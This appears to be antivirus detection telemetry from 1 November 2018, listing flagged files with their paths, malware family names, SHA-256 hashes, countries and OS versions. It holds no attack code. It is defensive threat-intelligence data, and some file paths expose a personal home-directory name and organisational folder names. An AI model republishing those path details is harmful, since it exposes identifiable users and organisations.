  Row(detection=Row(filename="oktober'16.exe", filepath="D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\TNA\\3. LAPORAN P2K3\\10. Oktober'16\\Oktober'16.exe", filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155433-b3239285', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155433-B3239285', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='skk.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\SKK\\SKK.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2017.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\2017.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012055-1984c897', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012055-1984C897', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ifversion.dll', filepath='C:\\Program Files (x86)\\AspenTech\\Aspen HYSYS V7.1\\IFVersion.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='6b41dc28bde442c5d161a7ddab28ca8f2b6fb75c507020de2926662ec11a21f1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T23:38:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124756-be788108', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124736-AD71273E\\AVSCAN-20181101-124756-BE788108', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:47:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epson321833eu.exe', filepath='D:\\c\\Mes documents\\downloads\\Programs\\epson321833eu.exe', filesize=13376000, name='W32/Sality.AG.#M1.#R1'), hash='a8fe30c84e9ac4cc4577ef29103bb69db4e3cf4245388b295b09f69d89574c45', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T12:59:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121340-e46e2a03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121306-C7532665\\AVSCAN-20181101-121340-E46E2A03', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:13:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='excel-web.xlt', filepath='C:\\Program Files\\KS\\smeta_ks9\\REPORT\\EXCEL-WEB.XLT', filesize=216000, name='X2000M/Agent.03377832.#M1.#R1'), hash='c52be89ae90b960543b102a1c17cfbb7ab10e25d2cbbe7d6e33ba51f48175b19', metadata=Row(cmdline='S', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\KS\\smeta_ks9\\ks.exe', parentsize=28453, timestamp='2018-11-01T05:20:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122142-7f27819f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122109-6399524A\\AVSCAN-20181101-122142-7F27819F', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:21:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='e84f82c3e157abebb048577d55bafd6123c0815f42501c92bc18270a57faaf99', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142911-24ec1076', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142911-24EC1076', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111622-2382fefb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111622-2382FEFB', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112035-43583a2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112035-43583A2C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:20:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (3).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (3).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T13:08:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installs.exe', filepath='E:\\sw2014x64bit\\SolidWorks Flow Simulation\\License\\Flexlm\\installs.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='839c19149a37cc63e62db446f80313ca033a58ea062366e999f10769d1aa99b8', metadata=Row(cmdline='-m:aeinv.dll -f:UpdateSoftwareInventoryW', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:23:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jtnzdg.dll', filepath='C:\\WINDOWS\\system32\\jtnzdg.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='resmgr.exe', filepath='C:\\Program Files\\VONE\\TopSecSV\\ResMgr.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MTWUrrMeKU+EfPMU.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T00:42:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='ad89b75827d2f9c125614f4d7d18aaae981a86dde80d5763cfbeb604a624e869', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:51:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T02:24:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-202912-b76f7e33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41a488c1\\AVSCAN-20181101-202813-B0318BC4\\AVSCAN-20181101-202912-B76F7E33', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:29:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='upr.exe', filepath='C:\\Windows\\upr.exe', filesize=64000, name='HEUR/AGEN.1008100.#M1.#R1'), hash='5fe522ad087cda06a9caafd79516ca2837642e8bea15fe103f58aada98aae3b1', metadata=Row(cmdline=None, country='HT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:30:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-221734-ff7b6d1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_632bd233\\AVSCAN-20181101-214038-A3F4827E\\AVSCAN-20181101-221734-FF7B6D1A', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='f050617d2d0523e608a75d8b18da14216817a23d9fb3970537f81debf497e5ac', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T20:17:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-083716-d3572b8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_adc73a22\\AVSCAN-20181101-083300-C4707F5A\\AVSCAN-20181101-083716-D3572B8C', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:37:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0003467.exe', filepath='E:\\System Volume Information\\_restore{69212C0F-784E-4A08-A5CD-0319A60006C2}\\RP2\\A0003467.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='609272e3acbf9256ff3ed781a0f544a1edf4ed9043581df3bfbc3b3e61f101de', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:47:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:23:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212055-3e43691a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d35cc67\\AVSCAN-20181101-212029-3B17A70D\\AVSCAN-20181101-212055-3E43691A', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='60f5a3d0559cf42a82e15e242bc4d2d7902f9d508ab48739c0a4ab8d72dced53', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\60F5A3D0559CF42A82E15E242BC4D2D7902F9D508AB48739C0A4AB8D72DCED53', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='60f5a3d0559cf42a82e15e242bc4d2d7902f9d508ab48739c0a4ab8d72dced53', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:25:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190628-0aba324c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c8ae91c6\\AVSCAN-20181101-190536-DE8A9691\\AVSCAN-20181101-190628-0ABA324C', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:06:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oneclickroot.img', filepath='c:\\users\\X\\downloads\\oneclickroot.img', filesize=3328000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='2f5f753b4a39f6f63fedf14dad45f747c5e3b86325dade378c898335e882e6a1', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T23:51:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-082752-aa0ec005', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4d71a40a\\AVSCAN-20181101-082718-A3BFB515\\AVSCAN-20181101-082752-AA0EC005', filesize=640000, name='TR/Dropper.Gen.#M1.#R1'), hash='0f07d20c1d9cf096d6c7dff1d49e70c95d28885c09443210d45dc71ac32c23b4', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:27:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111610-2d1327b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9ae1d9bb\\AVSCAN-20181101-111531-26FF4912\\AVSCAN-20181101-111610-2D1327B3', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:16:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:36:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apiutil.exe', filepath='c:\\users\\X\\desktop\\nmr software\\install-topspin-3.5pl2.tmp~\\windows\\bin\\apiutil.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='4682a5c1a07cdefd5b0db7496c9f21f8257c3be3ae87136287b1387d2f69e6ec', metadata=Row(cmdline='-administrator', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\nmr software\\install-topspin-3.5pl2.tmp~\\windows\\tcl-8.5.16\\bin\\tclsh85.exe', parentsize=102912, timestamp='2018-11-01T10:10:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:33:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000330-25df4544', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6b869d0\\AVSCAN-20181101-235218-991817B7\\AVSCAN-20181102-000330-25DF4544', filesize=448000, name='TR/Buzy.801.8.#M1.#R1'), hash='3c6e2b72e9c215863ebceba152e34d6c623cb3fedb928cfbaf96e44fdd67b231', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T22:03:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T23:08:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rnsuc938.exe.vir', filepath='G:\\AdwCleaner\\FileQuarantine\\C\\Program Files (x86)\\7244A63B-1464932024-3712-8456-AC9E17B3F42C\\rnsuC938.exe.vir', filesize=64000, name='HEUR/AGEN.1029143.#M1.#R1'), hash='74cbe763d6ea86a7df4b0311d62a2daba0f6ceee3a9d348c0b1f0aab0e912ee3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-01T04:31:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T11:58:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:57:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='150c1ae293ee6c85c21683021670a64ec4944ff46f37c517373a82a958676835', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:10:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lzpk_0943187284.doc', filepath='G:\\GPArhiv\\LZPK_0943187284.doc', filesize=128000, name='W97M/Agent.06750161.#M1.#R1'), hash='70d7c2334ce913dde554ec5770a502c593f574eaad533574b432b16f5815a535', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T18:38:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0007d982', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp0007d982', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:44:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00001ad9', filepath='C:\\Windows\\Temp\\tmp00000308\\tmp00001ad9', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T13:40:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T20:04:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_8_5_5.html', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Adobe\\Audition 1.5\\help\\ja_JP\\html\\1_8_5_5.html', filesize=1620000, name='W32/Chir.B.#M1.#R1'), hash='564db0c9450b80923355494e3c95d2a39861bf92e9ba41843186ffe22b04ade8', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:58:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='meccanica.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\MECCANICA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210556-0f5dfe8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2719552d\\AVSCAN-20181101-194621-414F84DB\\AVSCAN-20181101-210556-0F5DFE8F', filesize=128000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:05:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='chiavetta engim 2017.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\chiavetta engim 2017.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151525-3db8c7ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151525-3DB8C7AE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:15:32Z'), dt=datetime.date(2018, 11, 1)),
